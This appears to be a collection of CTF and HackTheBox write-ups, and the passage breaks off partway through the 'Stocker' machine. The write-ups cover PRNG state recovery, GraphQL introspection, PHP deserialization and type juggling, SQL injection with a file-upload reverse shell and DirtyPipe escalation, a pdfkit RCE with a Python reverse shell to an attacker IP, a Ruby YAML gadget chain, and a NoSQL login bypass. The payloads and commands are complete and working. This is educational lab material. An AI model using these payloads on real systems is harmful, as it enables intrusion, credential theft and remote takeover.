Here the random module of python can be predicted. If we know the seed value than all the next random int are same every time.

random.seed(time.time())
The seed is set to time.time() and we are given this value in challenge: 1678519928.9423187

know we can easily reverse this xor operation to get original image.

import time import random from PIL import Image random.seed(1678519928.9423187) flag_matrix = (img := Image.open('pixelite.png')).load() w, h = img.size for i in range(w): for j in range(h): flag_matrix[i, j] = tuple( map( lambda x: x ^ random.randint(0, 255), flag_matrix[i, j] ) ) img.save('flag.png')
flag.png:

GLUG{Y0u_4Re_noT_5o_w34k}

funwithrandom-1:

description: randcrack is fun or is it . let’s see if you can create your own

nc chall.foobar.nitdgplug.org 30001

file: chall.py

In this code we have rand_gen() function. if mt_index > 624 than it go inside if statement. else it will do the following operations:

y = mt[mt_index] y ^= (y >> 43) y ^= (y << 12) & TemperingMaskB y ^= (y << 67) & TemperingMaskC y ^= (y >> 69) mt_index += 1 return y
getstate() Return an object capturing the current internal state of the generator. and the seed is set through os.urandom(8) which is not predictable.

random.seed(os.urandom(8)) mt = list(random.getstate()[1])
here output is filled 624 times with rand_gen() function.

output = [] for _ in range(624): output.append(rand_gen())
again looking at this code we know that it will do this operations on mt aaray from 0 to 624 index.

y = mt[mt_index] y ^= (y >> 43) y ^= (y << 12) & TemperingMaskB y ^= (y << 67) & TemperingMaskC y ^= (y >> 69) mt_index += 1 return y
and we are given with the output’s value so by reversing this operations we can get the value of mt.

with this small trial and error experiment:

y = 1111121111 y ^= (y >> 43) print("y ^= (y >> 43)") print(y) y ^= (y << 12) & TemperingMaskB print("y ^= (y << 12) & TemperingMaskB") print(y) y ^= (y << 67) & TemperingMaskC print("y ^= (y << 67) & TemperingMaskC") print(y) y ^= (y >> 69) print("y ^= (y >> 69)") print(y)
output: y ^= (y >> 43) 1111121111 y ^= (y << 12) & TemperingMaskB 1736326359 y ^= (y << 67) & TemperingMaskC 1736326359 y ^= (y >> 69) 1736326359
now we know that only y ^= (y << 12) & TemperingMaskB this operation is effective rest are not making any changes.

so now we have to reverse this tempering here is python code for that:

def untemper(y): a = y << 12 b = y ^ (a & TemperingMaskB) c = b << 12 d = y ^ (c & TemperingMaskB) e = d << 12 f = y ^ (e & TemperingMaskB) g = f << 12 h = y ^ (g & TemperingMaskB) i = h << 12 final = y ^ (i & TemperingMaskB) return final
now from output[] we can get mt[]. but the for loop was run 624 times so next time we call rand_gen() it will go inside if condition.

for kk in range(N - M): y = (mt[kk] & UPPER_MASK) | (mt[kk + 1] & LOWER_MASK) mt[kk] = mt[kk + M] ^ (y >> 1) ^ mag01[y & 0x1] for kk in range(N - M, N - 1): y = (mt[kk] & UPPER_MASK) | (mt[kk + 1] & LOWER_MASK) mt[kk] = mt[kk + (M - N)] ^ (y >> 1) ^ mag01[y & 0x1] y = (mt[N - 1] & UPPER_MASK) | (mt[0] & LOWER_MASK) mt[N - 1] = mt[M - 1] ^ (y >> 1) ^ mag01[y & 0x1]
we will apply the same changes to our recovered mt[].

now we can get the next 5 int by applying this operations to first 5 elements of mt[].

y = mt[mt_index] y ^= (y >> 43) y ^= (y << 12) & TemperingMaskB y ^= (y << 67) & TemperingMaskC y ^= (y >> 69) mt_index += 1
now that we have the next 5 random element we can get the flag.

final python script:

import random from pwnlib.tubes.remote import remote N = 624 M = 397 MATRIX_A = 0x83a2b0c3 UPPER_MASK = 0x80000000 LOWER_MASK = 0x7fffffff TemperingMaskB = 0x3f5663d0 TemperingMaskC = 0x56e90000 mag01 = [0, MATRIX_A] def untemper(y): a = y << 12 b = y ^ (a & TemperingMaskB) c = b << 12 d = y ^ (c & TemperingMaskB) e = d << 12 f = y ^ (e & TemperingMaskB) g = f << 12 h = y ^ (g & TemperingMaskB) i = h << 12 final = y ^ (i & TemperingMaskB) return final conn = remote('chall.foobar.nitdgplug.org', 30001) conn.recvuntil("Generator\n\n".encode()) output = [int(i) for i in (conn.recvline().decode()[1:-2].split(','))] print(output) for i in range(len(output)): output[i] = untemper(output[i]) # print(output) mt = output for kk in range(N - M): y = (mt[kk] & UPPER_MASK) | (mt[kk + 1] & LOWER_MASK) mt[kk] = mt[kk + M] ^ (y >> 1) ^ mag01[y & 0x1] for kk in range(N - M, N - 1): y = (mt[kk] & UPPER_MASK) | (mt[kk + 1] & LOWER_MASK) mt[kk] = mt[kk + (M - N)] ^ (y >> 1) ^ mag01[y & 0x1] y = (mt[N - 1] & UPPER_MASK) | (mt[0] & LOWER_MASK) mt[N - 1] = mt[M - 1] ^ (y >> 1) ^ mag01[y & 0x1] # print(mt) mt_index = 0 for i in range(5): y = mt[mt_index] y ^= (y >> 43) y ^= (y << 12) & TemperingMaskB y ^= (y << 67) & TemperingMaskC y ^= (y >> 69) mt_index += 1 conn.recvuntil(":".encode()) print(f'{i+1}= {y}') conn.sendline(f'{y}'.encode()) print(conn.recvline().decode()) conn.close()
flag: GLUG{R4nd0m_Numb3r_G3n3r470r_15_tru3ly_r4nd0m_0r_15_17}

Web:

inspect:

Description: Don’t think too much. Just push to production http://chall.foobar.nitdgplug.org:30045/

Rest API was boring so I used modern technology.

Let’s open this website

Hmn Cannot GET /

I tried robots.txt and checked http response headers but nothing, so I did directory bruteforce and got this endpoint: /graphql GraphQL is a query language developed by Facebook

http://chall.foobar.nitdgplug.org:30045/graphql

Reference : https://blog.yeswehack.com/yeswerhackers/how-exploit-graphql-endpoint-bug-bounty/

Introspection is the ability to query which resources are available in the current API schema. Given the API, via introspection, we can see the queries, types, fields, and directives it supports.

GraphQL introspection payload:

{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}
response:

This secret field looks interesting let’s extract this.

payload:

{ secret { text } }
response:

when I saw the flag I immediately tried to submit it, but it was wrong then I realised that there are multiple flags.

75 in total.

first I thought it is rabbit hole, but I went through every flag and found this:

this makes sense inspect is challenge name and graphql is endpoint.

flag: GLUG{1nsp3c7_1n_gr4phq6}

This is correct one.

Happy Hacking

CloudSEK - Nullcon Cyber Security CTF 2023

Wed, 18 Oct 2023 00:00:00 +0000

ClouSEK’s CTF challenge during NULLCON 2023

Bases

Points: 100

Description:

Do you Know Your Bases?

PS: No Bruteforcing is required

This Challange does not require you to access any other Port

nc 43.204.152.119 1337

When connecting to the server we are given with Base64 encoded text and we have to submit the Base64 decoded text in the input but doing so it keep asking for new Base64 text

Looking at the challenge category (Scripting), we can figure out that this process requires automation with the use of any scripting language. I’m am using Python here

Python code:

from pwn import * conn = remote('43.204.152.119', 1337) a = conn.recvline() print(a) a = a.decode().split("\t")[1].split("\n")[0] a = b64d(a) print(a) for i in range(2, 102): print(i) conn.sendline(a) a = conn.recvline() print(a) try: a = a.decode().split("\t")[1].split("\n")[0] a = b64d(a) except IndexError as e: print(e) pass # print(a) pass # n=101 ; flag: CSEK{3he_bas3_dec04er} conn.close()
Output:

PS D:\GitHub\ctf> python .\1.py [x] Opening connection to 43.204.152.119 on port 1337 [x] Opening connection to 43.204.152.119 on port 1337: Trying 43.204.152.119 [+] Opening connection to 43.204.152.119 on port 1337: Done b'What does this mean:\tblZNdGp4endmVzRrNTZoRHBsZUpLSXlMWDFQVWlDYloyY1RGZDhFMDM5T3ZzUkFtSGFCUUdnWVNvN3JOcXU=\n' b'nVMtjxzwfW4k56hDpleJKIyLX1PUiCbZ2cTFd8E039OvsRAmHaBQGgYSo7rNqu' 2 b'> What does this mean:\tSGV6RjhocWF0MGlMUlBEQTFsTXJWS1VFNEpqVE9HTnhwMlhkNllCM3Y5U29zV0l3NXltYjdjbmtDUVpndWY=\n' ... 99 b'> What does this mean:\tSHltaGdNVWNJUTdvM3J3RFB1WmVuZlRLWXhxYjZOWHZHanpTOEZ0aU8yOUVBa1JkSldWc2wwTDRwQkMxNWE=\n' 100 b'> What does this mean:\tSnpzNkVCUTdZRloyd3JlNHUzVU1Sa2xtTHBPZzVkV1hEOXFiaHgwdmpTVlAxeUdUTkNuS2NmQTh0YWlISW8=\n' 101 b'> CSEK{3he_bas3_dec04er}\n' list index out of range [*] Closed connection to 43.204.152.119 port 1337
Flag: CSEK{3he_bas3_dec04er}

Serialization Saga

Points: 100

Description:

This Capture The Flag (CTF) challenge is designed to assess your ability to identify and exploit fundamental insecure deserialization vulnerabilities. Can you successfully execute the necessary functions and retrieve the flags? Lesssgoo!

PS: No Bruteforcing is required

https://webctf.cloudsek.com/serialization-saga

On the webpage we can see the php code.

PHP code:

php error_reporting(0); class CloudSEK { private $func_no; private $func_name; function __construct($no , $name) { if ($no == NULL && $name == NULL) { $this->func_no = $no; $this->func_name = $name; } } function __wakeup() { $func_map = array( 1 => "XVigil", 2 => "BeVigil", 3 => "GetMeDemFlagz", ); $func_no = $this->func_no; $func_name = str_rot13($this->func_name); if ($func_map[$func_no] === $func_name) { $this->$func_name(); } else { echo "Invalid Object Data "; } } function XVigil() { echo "XVigil is a cybersecurity platform designed to help organizations monitor and mitigate potential security threats and vulnerabilities across the digital landscape. "; } function BeVigil() { echo "World's first Security Search Engine mobiles that makes sure the applications installed in your phone are safe. "; } function GetMeDemFlagz() { $flag_file = "/tmp/flag.txt"; if (file_exists($flag_file)) { $file_contents = file_get_contents($flag_file); echo $file_contents; } else { $err_msg = "File Not Found! "; $file_contents = $err_msg; echo $err_msg; } } } // $cloudsek = new CloudSEK(1 , "XVigil"); $sess = $_GET["sess"]; if (!isset($sess)) { exit(); } $data = base64_decode($sess); $obj = unserialize($data); ?>

In this code we can see that it is checking if GET parameter sess exist if yes Base64 decode it and parse it to php unserialize()

There is also __wakeup() function which is called on unserialize

to get the flag we have to call GetMeDemFlagz function. __wakeup function will perform rot13 on func_name and value of func_no should be index of the name of function in func_map array.

Now lets create the payload

Object name would be CloudSEK <– name of the class. func_no = 3 and func_name = rot13(“GetMeDemFlagz”)

O:8:"CloudSEK":2:{s:7:"func_no";i:3;s:9:"func_name";s:13:"TrgZrQrzSyntm";}
Base64 decode this and put it in GET parameter sess

https://webctf.cloudsek.com/serialization-saga?sess=Tzo4OiJDbG91ZFNFSyI6Mjp7czo3OiJmdW5jX25vIjtpOjM7czo5OiJmdW5jX25hbWUiO3M6MTM6IlRyZ1pyUXJ6U3ludG0iO30=

Flag: CSEK{PhP_0Bj3CT_D3$3R1L1Z@T10N}

The SHA Juggler

Point: 100

Description:

Dive into the depths of “The SHA Juggler,” a mysterious web challenge that tests your prowess in PHP type juggling, cunning encoding techniques, and web exploitation. Your mission is to outwit the system, leveraging the peculiarities of PHP type comparisons, decipher the applied encodings, and exploit vulnerabilities to retrieve the concealed flag. Can you navigate the enigmatic interplay of types and encodings and emerge victorious?

PS: No Bruteforcing is required

https://webctf.cloudsek.com/the-sha-juggler

in the pagesource of the webpage there is a variable isThisNormal which have long hex code, let’s decode it

const isThisNormal = "50 44 39 77 61 48 41 4b 4c 79 38 67 65 57 39 31 58 32 5a 76 64 57 35 6b 58 32 31 6c 4c 6e 42 6f 63 41 70 70 5a 69 41 6f 61 58 4e 7a 5a 58 51 6f 4a 46 39 48 52 56 52 62 4a 32 68 68 63 32 67 6e 58 53 6b 70 49 48 73 4b 49 43 41 67 49 47 6c 6d 49 43 67 6b 58 30 64 46 56 46 73 6e 61 47 46 7a 61 43 64 64 49 44 30 39 50 53 41 69 4d 54 41 35 4d 7a 49 30 4d 7a 55 78 4d 54 49 69 4b 53 42 37 43 69 41 67 49 43 41 67 49 43 41 67 5a 47 6c 6c 4b 43 64 45 62 79 42 35 62 33 55 67 64 47 68 70 62 6d 73 67 61 58 52 7a 49 48 52 6f 59 58 51 67 5a 57 46 7a 65 54 38 2f 4a 79 6b 37 43 69 41 67 49 43 42 39 43 69 41 67 49 43 41 6b 61 47 46 7a 61 43 41 39 49 48 4e 6f 59 54 45 6f 4a 46 39 48 52 56 52 62 4a 32 68 68 63 32 67 6e 58 53 6b 37 43 69 41 67 49 43 41 6b 64 47 46 79 5a 32 56 30 49 44 30 67 63 32 68 68 4d 53 67 78 4d 44 6b 7a 4d 6a 51 7a 4e 54 45 78 4d 69 6b 37 43 69 41 67 49 43 42 70 5a 69 67 6b 61 47 46 7a 61 43 41 39 50 53 41 6b 64 47 46 79 5a 32 56 30 4b 53 42 37 43 69 41 67 49 43 41 67 49 43 41 67 61 57 35 6a 62 48 56 6b 5a 53 67 6e 5a 6d 78 68 5a 79 35 77 61 48 41 6e 4b 54 73 4b 49 43 41 67 49 43 41 67 49 43 42 77 63 6d 6c 75 64 43 41 6b 5a 6d 78 68 5a 7a 73 4b 49 43 41 67 49 48 30 67 5a 57 78 7a 5a 53 42 37 43 69 41 67 49 43 41 67 49 43 41 67 63 48 4a 70 62 6e 51 67 49 6b 4e 54 52 55 74 37 62 6a 42 66 4e 47 78 68 5a 31 38 30 58 33 56 39 49 6a 73 4b 49 43 41 67 49 48 30 4b 66 53 41 4b 50 7a 34 3d";
It is double encoding: hex > Base64

Tool used to decode: https://gchq.github.io/CyberChef/#

after decoding it with hex and Base64 we get php code:

php // you_found_me.php if (isset($_GET['hash'])) { if ($_GET['hash'] === "10932435112") { die('Do you think its that easy??'); } $hash = sha1($_GET['hash']); $target = sha1(10932435112); if($hash == $target) { include('flag.php'); print $flag; } else { print "CSEK{n0_4lag_4_u}"; } } ?>
This is php code for file you_found_me.php and it will check for GET parameter hash and to get the flag it will check for the condition if sha1(10932435112) == sha1($_GET['hash'])

But before this it will check if $_GET['hash'] === "10932435112" if yes die.

We can see that for the flag condition it is using == in $hash == $target. this is loosely comparision

The sha1 of 10932435112 = 0e07766915004133176347055865026311692244 and in php this is treated as scientific E-notation.

Scientific E-notation is used to write very long numbers in a short form, 1e6 is 10^6 which is 1000000

Now because this sha1 hash of “10932435112” start with 0e0 it will be trated as “0” because 0^anythig is 0. so any string which have sha1 hash starting with 0e and followed by any number will be treated as “0” and it will pass the condition.

Reference for this type of hashes: https://github.com/spaze/hashes/blob/master/sha1.md

This hashes are also known as magic hashes

here I’m using the payload: hash=aaroZmOk

https://webctf.cloudsek.com/the-sha-juggler/you_found_me.php?hash=aaroZmOk
Flag: CSEK{typ3_juggl1ng_1n_php}

Happy Hacking

Internal Hiring Challenge Machine WriteUp

Thu, 28 Sep 2023 00:00:00 +0000

Challenge Type : Blackbox Testing

Challenge Description: Download the VM and start it. It has a web application hosted which is configured to boot at start so you can put the VM in the background. Simply find the address of the application and start pentesting.

Challenge Goal: Find the file flag.txt and read its content.

First we start by finding the IP of machine here i used the netdiscover command.

┌─[aftab@parrot]─[~/Downloads/practice/challenge] └──╼ $sudo netdiscover -r 192.168.1.12/24 Currently scanning: Finished! | Screen View: Unique Hosts 5 Captured ARP Req/Rep packets, from 5 hosts. Total size: 300 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.1.4 **:**:**:**:**:** 1 60 CHONGQING FUGUI ELECTRONICS 192.168.1.1 **:**:**:**:**:** 1 60 Syrotech Networks. Ltd. 192.168.1.5 **:**:**:**:**:** 1 60 Intel Corporate 192.168.1.21 **:**:**:**:**:** 1 60 Intel Corporate
here 192.168.1.1 is ip of router.

we scane the IP 192.168.1.5,192.168.1.21 and the IP 192.168.1.21 have web service running at port 42710.

I use rustscan for port scaning in CTFs because it is insanely fast.

┌─[aftab@parrot]─[~/Downloads/practice/challenge] └──╼ $rustscan -a 192.168.1.21 File limit higher than batch size. Can increase speed by increasing batch size '-b 924'. Open 192.168.1.21:42710 Starting Script(s) Script to be run Some("nmap -vvv -p {{port}} {{ip}}") ...
opening this website we have nothing but this page:

First though was to look for robots.txt file but no luck so i did directory bruteforcing with gobuster.

┌─[aftab@parrot]─[~/Downloads/practice/challenge] └──╼ $gobuster dir -u http://192.168.1.21:42710/ -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.1.21:42710/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2022/12/21 22:09:58 Starting gobuster in directory enumeration mode =============================================================== /.hta (Status: 403) [Size: 280] /.htaccess (Status: 403) [Size: 280] /.htpasswd (Status: 403) [Size: 280] /Admin (Status: 301) [Size: 321] [--> http://192.168.1.21:42710/Admin/] /assets (Status: 301) [Size: 322] [--> http://192.168.1.21:42710/assets/] /includes (Status: 301) [Size: 324] [--> http://192.168.1.21:42710/includes/] /index.php (Status: 200) [Size: 349] /search_result (Status: 301) [Size: 329] [--> http://192.168.1.21:42710/search_result/] /server-status (Status: 403) [Size: 280] =============================================================== 2022/12/21 22:10:05 Finished ===============================================================
now we have some interesting directories like Admin and search_result.

Admin page requires authentication Username and Password.

http://192.168.1.21:42710/search_result/

now this is something interesting there is link to

http://192.168.1.21:42710/search_result/result_2022.php

The Results of 2022 have not been published yet so let’s try 2021 :

http://192.168.1.21:42710/search_result/result_2021.php

on submitting the form we have this response:

ID, Name, Roll, Marks it looks like it is fetching this data from sql database so lets try SQL injection.

this POST request have data=NjIxNzI5NTgx it base64 encoded value of 621729581.

lets try with simple payload ' OR 1=1 # but it is not working after few tries i tried 621729581 OR 1=1 base64 encode and it gives us all the entries hooray, and that is successful SQL injection.

payload:

data=<@base64>621729581 OR 1=1<@/base64>

I’m using Hackvertor burp extension.

we know the number of columns it is 4 : ID, Name, Roll, Marks.So the payload for union attack would be:

payload:

data=<@base64>621729581 UNION SELECT NULL, NULL, NULL, NULL<@/base64>
It gives us the result in response so payload is correct and we also know the data types it should be Integer for ID, Roll, Marks and String for Name so we can put this values in payload.

payload:

data=<@base64>621729581 UNION SELECT 1, "name", 2, 3<@/base64>
response:

Now we can try to extract the databases’name, tables’name, columns’name.

Reference: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md

payload:

data=<@base64>621729581 UNION SELECT 1, gRoUp_cOncaT(0x7c,schema_name,0x7c), 2, 3 fRoM information_schema.schemata<@/base64>
response:

|mysql|,|information_schema|,|performance_schema|,|sys|,|ezbox|
Now let’s try to extract table name.

payload:

data=<@base64>621729581 UNION SELECT 1, gRoUp_cOncaT(0x7c,table_name,0x7c), 2, 3 fRoM information_schema.tables<@/base64>
response:

|results|,|users|,|ADMINISTRABLE_ROLE_AUTHORIZATIONS|,|APPLICABLE_ROLES|,|CHARACTER_SETS|,|CHECK_CONSTRAINTS|,|COLLATIONS|,|COLLATION_CHARACTER_SET_APPLICABILITY|,|COLUMNS|,|COLUMNS_EXTENSIONS|,|COLUMN_PRIVILEGES|,|COLUMN_STATISTICS|,|ENABLED_ROLES|,|ENGINES|,|EVENTS|,|FILES|,|INNODB_BUFFER_PAGE|,|INNODB_BUFFER_PAGE_LRU|,|INNODB_BUFFER_POOL_STATS|,|INNODB_CACHED_INDEXES|,|INNODB_CMP|,|INNODB_CMPMEM|,|INNODB_CMPMEM_RESET|,|INNODB_CMP_PER_INDEX|,|INNODB_CMP_PER_INDEX_RESET|,|INNODB_CMP_RESET|,|INNODB_COLUMNS|,|INNODB_DATAFILES|,|INNODB_FIELDS|,|INNODB_FOREIGN|,|INNODB_FOREIGN_COLS|,|INNODB_FT_BEING_DELETED|,|INNODB_FT_CONFIG|,|INNODB_FT_DEFAULT_STOPWORD|,|INNODB_FT_DELETED|,|INNODB_FT_INDEX_CACHE|,|INNODB_FT_INDEX_TABLE|,|INNODB_INDEXES|,|INNODB_METRICS|,|INNODB_SESSION_TEMP_TABLESPACES|,|INNODB_TABLES|,|INNODB_TABLESPACES|,|INNODB_TABLESPACES_BRIEF|,|INNODB_TABLESTATS|,|INNODB_TEMP_TABLE_INFO|,|INNODB_TRX|,|INNODB_VIRTUAL|,|KEYWORDS|,|KEY_COLUMN_USAGE|,|OPTIMIZER_TRACE|,|PARAMETERS|,|PARTITIONS|,|PLUGINS|,|PRO
We have table with name users let’s see the columns of this table.

payload:

data=<@base64>621729581 UNION SELECT 1, gRoUp_cOncaT(0x7c,column_name,0x7c), 2, 3 fRoM information_schema.columns wHeRe table_name="users"<@/base64>
response:

|id|,|password|,|profile_picture|,|username|,|CURRENT_CONNECTIONS|,|TOTAL_CONNECTIONS|,|USER|
We have username and password feilds here. Let’s extract them!

payload:

data=<@base64>621729581 UNION SELECT 1, gRoUp_cOncaT(0x7c,username,0x7c), 2, 3 fRoM users<@/base64>
response: |Admin|

username=Admin

payload:

data=<@base64>621729581 UNION SELECT 1, gRoUp_cOncaT(0x7c,password,0x7c), 2, 3 fRoM users<@/base64>
response: |zohl8meicohci9raw0|

password=zohl8meicohci9raw0

We have username and password let’s login as Admin.

http://192.168.1.21:42710/Admin/dashboard.php

looking at source code we have this comment:

visiting this page http://192.168.1.21:42710/Admin/edit_profile.php

We have functionality of file upload let’s try uploading some php file.

Oops error can’t upload php, let’s try simple jpg file.

so we can only upload jpg file but how it is checking for file type extension? let’s do one experiment rename the jpg file to php if error it is looking for extension and if successful it is checking MIME type.

Record updated successfullyThe file has been uploaded, so MIME type it is.

We have to create polyglot PHP/JPG payload. how i do it is open jpg file and append php payload at last so let’s create simple.php payload.

Record updated successfullyThe file has been uploaded and file is uploaded successfully but where ?

we have column name profile_picture in users table, if you remember that we still have SQLi.

payload=

data=<@base64>621729581 UNION SELECT 1, gRoUp_cOncaT(0x7c,profile_picture,0x7c), 2, 3 fRoM users<@/base64>
result = |../assets/uploads/simple.php|

so our file is at http://192.168.1.21:42710/assets/uploads/simple.php

It works just fine let’s get reverse shell. for reference: https://www.revshells.com/

revshell.php

we start listener: nc -lvnp 8888

and path= http://192.168.1.21:42710/assets/uploads/revshell.php

on visiting this file we have reverse shell:

┌─[aftab@parrot]─[~/Downloads/practice/challenge] └──╼ $nc -lvnp 8888 listening on [any] 8888 ... connect to [192.168.1.12] from (UNKNOWN) [192.168.1.21] 38442 Linux heathrow-VirtualBox 5.11.0-16-generic #17-Ubuntu SMP Wed Apr 14 20:12:43 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux 23:44:47 up 2:01, 1 user, load average: 0.00, 0.01, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT heathrow tty2 tty2 21:32 2:12m 0.03s 0.03s /usr/libexec/gnome-session-binary --systemd --session=ubuntu uid=33(www-data) gid=33(www-data) groups=33(www-data) bash: cannot set terminal process group (732): Inappropriate ioctl for device bash: no job control in this shell www-data@heathrow-VirtualBox:/$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data) www-data@heathrow-VirtualBox:/$
We have shell but we can’t access /home/heathrow we need to escalate our privilege. first thing that comes in mind is linpeas.sh. let’s move that to victim machine i create local server with python python -m http.server 80, to transfer file because we normally don’t have internet access in victim machine.

change permissions to +x : chmod +x linpeas.sh

Now run the file: ./linpeas.sh

Analyzing the output we have first suggestion for [CVE-2022-0847] DirtyPipe:

reference: https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits

we follow the steps in GitHub repo and we have exploit-1, exploit-2. transfer this to victim machine and run.

www-data@heathrow-VirtualBox:/tmp$ wget 192.168.1.12/exploit-2 wget 192.168.1.12/exploit-2 --2022-12-22 00:04:11-- http://192.168.1.12/exploit-2 Connecting to 192.168.1.12:80... connected. HTTP request sent, awaiting response... 200 OK Length: 21480 (21K) [application/octet-stream] Saving to: 'exploit-2' 0K .......... .......... 100% 395K=0.05s 2022-12-22 00:04:11 (395 KB/s) - 'exploit-2' saved [21480/21480]
www-data@heathrow-VirtualBox:/tmp$ ./exploit-2 /usr/bin/sudo ./exploit-2 /usr/bin/sudo id uid=0(root) gid=0(root) groups=0(root),33(www-data) find / -type f -name "flag.txt" 2>/dev/null /home/heathrow/flag.txt cat /home/heathrow/flag.txt flag{box_cracked_successfully_report_to_admin}challenge

flag:

flag{box_cracked_successfully_report_to_admin}challenge
Happy Hacking

Precious - HackTheBox

Thu, 28 Sep 2023 00:00:00 +0000

About Precious

Precious is an Easy Difficulty Linux machine, that focuses on the Ruby language.

It hosts a custom Ruby web application, using an outdated library, namely pdfkit, which is vulnerable to CVE-2022-25765, leading to an initial shell on the target machine.

After a pivot using plaintext credentials that are found in a Gem repository config file, the box concludes with an insecure deserialization attack on a custom, outdated, Ruby script.

Scanning

Port scaning with nmap

port 80 is open : redirect to http://precious.htb/

add this to /etc/hosts.

Foothold

On this page we have Convert Web Page to PDF functionality.

after giving url pdf file is downloaded.

using exiftool on pdf we know that it is Generated by pdfkit v0.8.6.

This version is vulnerable to RCE.

Payload:

http://%20`{command}`
we can use this payload to get reverse shell:

http://%20`python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.40",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'`
references: https://www.revshells.com/

we get shell as user ruby

Escalating Privileges

we can see two user in /home directory.

user flag is in directory of user henry but it is not accessible.

inside the directory of user ruby there is config file in .bundle in this file we can see password of user henry.

we can use this for ssh to henry.

user can run /opt/update_dependencies.rb as root with sudo.

this file is not writable. looking at code we see it use YAML.load, which is vulnerable to deserialization attack.

we can write in dependencies.yml.

payload:

--- - !ruby/object:Gem::Installer i: x - !ruby/object:Gem::SpecFetcher i: y - !ruby/object:Gem::Requirement requirements: !ruby/object:Gem::Package::TarReader io: &1 !ruby/object:Net::BufferedIO io: &1 !ruby/object:Gem::Package::TarReader::Entry read: 0 header: "abc" debug_output: &1 !ruby/object:Net::WriteAdapter socket: &1 !ruby/object:Gem::RequestSet sets: !ruby/object:Net::WriteAdapter socket: !ruby/module 'Kernel' method_id: :system git_set: cat /root/root.txt method_id: :resolve
reference: https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565#file-ruby_yaml_load_sploit2-yaml

now we can run this with sudo and get the root flag.

sudo /usr/bin/ruby /opt/update_dependencies.rb

This will give the root flag.

Happy Hacking

Stocker - HackTheBox

Wed, 27 Sep 2023 00:00:00 +0000

About Stocker

Stocker is a medium difficulty Linux machine that features a website running on port 80 that advertises various house furniture.

Through vHost enumeration the hostname dev.stocker.htb is identified and upon accessing it a login page is loaded that seems to be built with NodeJS.

By sending JSON data and performing a NoSQL injection, the login page is bypassed and access to an e-shop is granted.

Enumeration of this e-shop reveals that upon submitting a purchase order, a PDF is crafted that contains details about the items purchased. This functionality is vulnerable to HTML injection and can be abused to read system files through the usage of iframes.

The index.js file is then read to acquire database credentials and owed to password re-use users can log into the system over SSH.

Privileges can then be escalated by performing a path traversal attack on a command defined in the sudoers file, which contains a wildcard for executing JavaScript files.

Scanning

we atart with nmap scan:

┌──(Jack㉿Sparrow)-[~/Downloads/htb/stocker] └─$ sudo nmap -sS -sC -T5 10.10.11.196 -oN nmap.txt [sudo] password for Jack: Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-30 02:18 EDT Nmap scan report for 10.10.11.196 Host is up (0.68s latency). Not shown: 938 closed tcp ports (reset), 60 filtered tcp ports (no-response) PORT STATE SERVICE 22/tcp open ssh | ssh-hostkey: | 3072 3d12971d86bc161683608f4f06e6d54e (RSA) | 256 7c4d1a7868ce1200df491037f9ad174f (ECDSA) |_ 256 dd978050a5bacd7d55e827ed28fdaa3b (ED25519) 80/tcp open http |_http-title: Did not follow redirect to http://stocker.htb Nmap done: 1 IP address (1 host up) scanned in 29.93 seconds
Foothold

we have 2 ports open: 22(ssh) , 80(http).

add stocker.htb to /etc/hosts file.

visiting this page we see one comment from Angoose Garden, Head of IT at Stockers Ltd.

next we try to bruteforce subdomains:

┌──(Jack㉿Sparrow)-[~] └─$ gobuster vhost -u stocker.htb -w /usr/share/wordlists/dirb/common.txt --append-domain -t 100 =============================================================== Gobuster v3.5 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://stocker.htb [+] Method: GET [+] Threads: 100 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] User Agent: gobuster/3.5 [+] Timeout: 10s [+] Append Domain: true =============================================================== 2023/03/30 02:44:46 Starting gobuster in VHOST enumeration mode =============================================================== Found: dev.stocker.htb Status: 302 [Size: 28] [--> /login] Progress: 4614 / 4615 (99.98%) =============================================================== 2023/03/30 02:45:04 Finished ===============================================================
again we need to add dev.stocker.htb to /etc/hosts file.

NoSQL Injection Login bypass

after few try and errors we found that login page is vulnerable to NoSQL Injection.

Content-Type: application/json

Payload: {"username": {"$ne": null}, "password": {"$ne": null}}

here we can purchase something through api and on view order it will generate pdf or that order.

Since it generates PDF on the server side, let’s see if we can include server files.

Read local files using PDF generation

Let’s try to Read local file.

Path:api/order Payload:

{"basket":[{"_id":"638f116eeb060210cbd83a8d","title":"","description":"It's a red cup.","image":"/etc/passwd","price":32,"currentStock":4,"__v":0,"amount":1}]}
response:

{"success":true,"orderId":"642550c92e188ca84f0a3f46"}
we can see generated PDF at /api/po/642550c92e188ca84f0a3f46.

We can modify our payload to increase the view area:

{"basket":[{"_id":"638f116eeb060210cbd83a8d","title":"","description":"It's a red cup.","image":"Yo","price":32,"currentStock":4,"__v":0,"amount":1}]}
result:

we found Password: IHeardPassphrasesArePrettySecure

previously we show one comment from Angoose Garden, Head of IT at Stockers Ltd.

we can try this username:Angoose and password on ssh.

Escalating Privileges

chech root Permission using sudo -l

